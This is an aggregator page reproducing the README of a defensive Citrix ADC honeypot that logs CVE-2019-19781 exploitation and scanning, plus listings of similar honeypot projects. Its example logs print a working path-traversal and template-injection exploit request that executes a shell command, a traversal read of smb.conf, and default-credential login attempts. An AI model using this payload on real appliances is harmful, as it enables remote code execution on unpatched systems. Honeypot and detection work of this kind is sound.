GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → x1sec → citrix-honeypot

x1sec / citrix-honeypot

Licence: MIT license
Citrix ADC (NetScaler) Honeypot. Supports detection for CVE-2019-19781 and login attempts

Programming Languages

go
31211 projects - #10 most used programming language

Labels

honeypotcitrix-netscalercitrixcitrix-adccve-2019-19781shitrixcitrixmash

Projects that are alternatives of or similar to citrix-honeypot

citrixmash scanner
A fast multi threaded scanner for Citrix ADC (NetScaler) CVE-2019-19781 - Citrixmash / Shitrix
Stars: ✭ 36 (+50%)
Mutual labels:  citrix, cve-2019-19781, shitrix, citrixmash
citrix-adc-aws-cloudformation
Citrix ADC (Formerly Netscaler) templates and scripts for AWS deployment
Stars: ✭ 11 (-54.17%)
Mutual labels:  citrix-netscaler, citrix, citrix-adc
go-nitro
A Golang client to the Citrix ADC API
Stars: ✭ 18 (-25%)
Mutual labels:  citrix-netscaler, citrix, citrix-adc
check netscaler
A Nagios Plugin written in Perl for the Citrix ADC (formerly Citrix NetScaler). It uses the NetScaler NITRO API.
Stars: ✭ 36 (+50%)
Mutual labels:  citrix-netscaler, citrix
terraform-provider-citrixadc
Terraform Custom Provider for Citrix ADC (formerly Citrix NetScaler)
Stars: ✭ 89 (+270.83%)
Mutual labels:  citrix-netscaler, citrix-adc
Deception As Detection
Deception based detection techniques mapped to the MITRE’s ATT&CK framework
Stars: ✭ 228 (+850%)
Mutual labels:  honeypot
Tpotce
🍯 T-Pot - The All In One Honeypot Platform 🐝
Stars: ✭ 3,105 (+12837.5%)
Mutual labels:  honeypot
Hfish
安全、可靠、简单、免费的企业级蜜罐
Stars: ✭ 2,977 (+12304.17%)
Mutual labels:  honeypot
Secure Wireguard Implementation
A guide on implementing a secure Wireguard server on OVH (or any other Debian VPS) with DNSCrypt, Port Knocking & an SSH-Honeypot
Stars: ✭ 200 (+733.33%)
Mutual labels:  honeypot
fakessh
A dockerized fake SSH server honeypot written in Go that logs login attempts.
Stars: ✭ 42 (+75%)
Mutual labels:  honeypot
prickly-pete
A script using Docker to quickly bring up some honeypots exposing lots of services. For research, reconnaissance, and fun. (DISCLAIMER may not be fun, not to be taken internally, aim away from face)
Stars: ✭ 29 (+20.83%)
Mutual labels:  honeypot
Trapdoor
Serverless honeytoken 🕵🏻‍♂️
Stars: ✭ 70 (+191.67%)
Mutual labels:  honeypot
Chameleon
Customizable honeypots for monitoring network traffic, bots activities and username\password credentials (DNS, HTTP Proxy, HTTP, HTTPS, SSH, POP3, IMAP, STMP, RDP, VNC, SMB, SOCKS5, Redis, TELNET, Postgres and MySQL)
Stars: ✭ 230 (+858.33%)
Mutual labels:  honeypot
ZKShS
Search shodan without any knowledge about its queries
Stars: ✭ 37 (+54.17%)
Mutual labels:  honeypot
honeycomb
An extensible honeypot framework
Stars: ✭ 93 (+287.5%)
Mutual labels:  honeypot
Honeybits
A PoC tool designed to enhance the effectiveness of your traps by spreading breadcrumbs & honeytokens across your systems to lure the attacker toward your honeypots
Stars: ✭ 222 (+825%)
Mutual labels:  honeypot
Loki
一个轻量级Web蜜罐 - A Little Web Honeypot.🍯🍯🍯🐝🐝🐝
Stars: ✭ 151 (+529.17%)
Mutual labels:  honeypot
Telnet Iot Honeypot
Python telnet honeypot for catching botnet binaries
Stars: ✭ 252 (+950%)
Mutual labels:  honeypot
List Of User Agents
List of major web + mobile browser user agent strings. +1 Bonus script to scrape :)
Stars: ✭ 247 (+929.17%)
Mutual labels:  honeypot
Ehoney
安全、快捷、高交互、企业级的蜜罐管理系统,护网;支持多种协议蜜罐、蜜签、诱饵等功能。A safe, fast, highly interactive and enterprise level honeypot management system, supports multiple protocol honeypots, honeytokens, baits and other functions.
Stars: ✭ 1,051 (+4279.17%)
Mutual labels:  honeypot
View All Similar Projects ➔

Citrix ADC (NetScaler) Honeypot

  • Detects and logs payloads for CVE-2019-19781 (Shitrix / Citrixmash)
  • Logs failed login attempts
  • Serves content and headers taken from real appliance in order to increase chance of indexing on search engines (e.g. google, shodan etc.)

screenshot

Installation

Precompiled

Precompiled Linux (x64) package available here

mkdir citrix-honeypot
cd citrix-honeypot
wget https://github.com/x1sec/citrix-honeypot/releases/download/v0.02/citrix-honeypot-linux-amd64.tar.gz
tar -xf citrix-honeypot-linux-amd64.tar.gz

go get

If you have a Go environment ready to go:

go get github.com/x1sec/citrix-honeypot

Running

Generate self signed certificate:

openssl genrsa -out server.key 2048
openssl ecparam -genkey -name secp384r1 -out server.key
openssl req -new -x509 -sha256 -key server.key -out server.crt -days 3650

It's easy as:

./citrix-honeypot

The honeypot will listen on both port 80 and 443 (so it must be run as root user)

Or to detach and run as a background process:

nohup ./citrix-honeypot &

Logs

Results / data is written to the ./log directory. They are:

hits.log - Scanning attempts and exploitation attempts with all data (e.g. headers, post body)

all.log - All HTTP requests that are observed hitting the server

logins.log - Attempted logins to the web interface

tlsErrors.log - Often internet scanners will send invalid data to port 443. HTTPS errors are logged here.

Examples

Running the first public released exploit:

$ cat logs/hits.log 
2020/01/23 08:27:55 
-------------------
Exploitation detected ...
src: xxx.xxx.xxx.xxx
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/2.0
Host: xxx.xxx.xxx.xxx
Accept: */*
Content-Length: 181
Content-Type: application/x-www-form-urlencoded
Nsc_nonce: test1337
Nsc_user: /../../../../../../../../../../netscaler/portal/templates/zToMJRAzp0T0FuUS2cEp41ZZbmrtmUqS
User-Agent: curl/7.67.0

url=http://example.com\&title=[%25+template.new({'BLOCK'%3d'exec(\'id | tee /netscaler/portal/templates/zToMJRAzp0T0FuUS2cEp41ZZbmrtmUqS.xml\')%3b'})+%25]\&desc=test\&UI_inuse=RfWeb

Scanning attempt:

$ cat logs/hits.log 
2020/01/23 08:41:02 
-------------------
Scanning detected ... 
src: xxx.xxx.xxx.xxx
GET /vpn/../vpns/cfg/smb.conf HTTP/2.0
Host: xxx.xxx.xxx.xxx
Accept: */*
User-Agent: curl/7.67.0

Login attempts:

$ cat logs/logins.log
2020/01/23 07:26:03 Failed login from xxx.xxx.xxx.xxx user:nsroot pass:nsroot
2020/01/23 08:26:03 Failed login from xxx.xxx.xxx.xxx user:admin pass:admin
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].